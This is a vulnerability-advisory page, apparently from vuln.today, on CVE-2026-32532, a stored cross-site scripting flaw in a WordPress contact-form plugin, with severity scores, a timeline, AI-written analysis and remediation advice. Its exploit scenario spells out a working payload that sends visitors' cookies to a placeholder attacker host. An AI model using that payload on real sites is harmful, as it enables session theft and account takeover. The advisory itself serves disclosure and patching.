
Contact Form Lead Form Elementor Builder CVE-2026-32532

EUVD-2026-15903 · HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 · Patchstack · GHSA-prm5-vp6h-vqjq
CVSS 3.1 (NVD): 7.1

Severity by source

NVD PRIMARY
7.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Changed
  • Confidentiality: Low
  • Integrity: Low
  • Availability: Low

Lifecycle Timeline (4 events)

  • Apr 24, 2026 - 16:37 (vuln.today): Re-analysis Queued (cvss_changed)
  • Mar 25, 2026 - 16:47 (euvd): EUVD ID Assigned (EUVD-2026-15903)
  • Mar 25, 2026 - 16:47 (vuln.today): Analysis Generated
  • Mar 25, 2026 - 16:15 (nvd): CVE Published (HIGH 7.1)

Description (CVE.org)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHunk Contact Form & Lead Form Elementor Builder (lead-form-builder) allows Stored XSS. This issue affects Contact Form & Lead Form Elementor Builder: from n/a through <= 2.0.1.

Analysis (AI)

A Stored Cross-Site Scripting (XSS) vulnerability exists in ThemeHunk's Contact Form & Lead Form Elementor Builder plugin for WordPress, affecting all versions through 2.0.1. An attacker can inject malicious scripts into form fields that are stored in the database and executed in the browsers of administrators or other users who view the submitted data, potentially leading to account takeover, data theft, or malware distribution. …


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

  • Access: Inject malicious JavaScript into form field
  • Delivery: Form submission stores XSS payload in database
  • Exploit: Admin views form response
  • Execution: Stored payload executes in admin browser
  • Impact: Attacker steals session cookies or credentials

Vulnerability Assessment (AI)

Exploitation: Attacker with ability to create or modify forms in ThemeHunk Contact Form & Lead Form Elementor Builder (versions ≤2.0.1) can inject malicious scripts. …

Risk Assessment: While CVSS and EPSS scores are not provided, this vulnerability carries significant real-world risk due to its nature as a Stored XSS in a widely-deployed WordPress form plugin. …

Exploit Scenario: An attacker submits a contact form containing a stored XSS payload such as <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> in a form field. The plugin stores this unsanitized input in the WordPress database. …

Remediation: Immediately update the Contact Form & Lead Form Elementor Builder plugin to the latest version released by ThemeHunk after 2.0.1; check the Patchstack database entry (https://patchstack.com/database/Wordpress/Plugin/lead-form-builder/vulnerability/wordpress-contact-form-lead-form-elementor-builder-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve) for the patched version number and download it from the official WordPress.org plugin repository. …

Recommended Action (AI)

Within 7 days: Identify all affected systems and apply vendor patches promptly. …


CVE-2026-32532 vulnerability details – vuln.today
